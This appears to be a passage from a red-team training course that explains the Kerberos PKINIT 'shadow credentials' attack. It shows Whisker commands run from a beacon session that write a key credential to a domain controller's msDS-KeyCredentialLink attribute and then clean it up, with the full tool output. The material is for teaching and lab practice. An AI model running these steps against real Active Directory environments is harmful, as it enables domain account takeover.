Whilst Kerberos pre-authentication is typically carried out using a symmetric key derived from a client's password, asymmetric keys are also possible via Public Key Cryptography for Initial Authentication (PKINIT). If a PKI solution is in place, such as Active Directory Certificate Services (next chapter), the domain controllers and domain members exchange their public keys via the appropriate Certificate Authority. This is called the Certificate Trust model.
There is also a Key Trust model, where trust is established based on raw key data rather than a certificate. This requires a client to store their key on their own domain object, in an attribute called msDS-KeyCredentialLink. The basis of the "shadow credentials" attack is that if you can write to this attribute on a user or computer object, you can obtain a TGT for that principal. As such, this is a DACL-style abuse as with RBCD.
Along with his excellent blog post on the subject, Elad Shamir published a tool called Whisker, which makes exploiting this very easy. First, we want to list any keys that might already be present for a target - this is important for when we want to clean up later.
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc-2$
[*] Searching for the target account
[*] Target user found: CN=DC-2,OU=Domain Controllers,DC=dev,DC=cyberbotic,DC=io
[*] Listing deviced for dc-2$:
[*] No entries!
\
Add a new key pair to the target.
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe add /target:dc-2$
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password y52EhYqlfgnYPuRb
[*] Searching for the target account
[*] Target user found: CN=DC-2,OU=Domain Controllers,DC=dev,DC=cyberbotic,DC=io
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 58d0ccec-1f8c-4c7a-8f7e-eb77bc9be403
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
\
And now, we can ask for a TGT using the Rubeus command that Whisker provides.
Whisker's clear command will remove any and all keys from msDS-KeyCredentialLink. This is a bad idea if a key was already present, because it will break legitimate passwordless authentication that was in place. If this was the case, you can list the entries again and only remove the one you want.
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc-2$
[*] Searching for the target account
[*] Target user found: CN=DC-2,OU=Domain Controllers,DC=dev,DC=cyberbotic,DC=io
[*] Listing deviced for dc-2$:
DeviceID: 58d0ccec-1f8c-4c7a-8f7e-eb77bc9be403 | Creation Time: 1/21/2023 7:19:04 PM
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe remove /target:dc-2$ /deviceid:58d0ccec-1f8c-4c7a-8f7e-eb77bc9be403
[*] Searching for the target account
[*] Target user found: CN=DC-2,OU=Domain Controllers,DC=dev,DC=cyberbotic,DC=io
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Found value to remove
[+] Updated the msDS-KeyCredentialLink attribute of the target object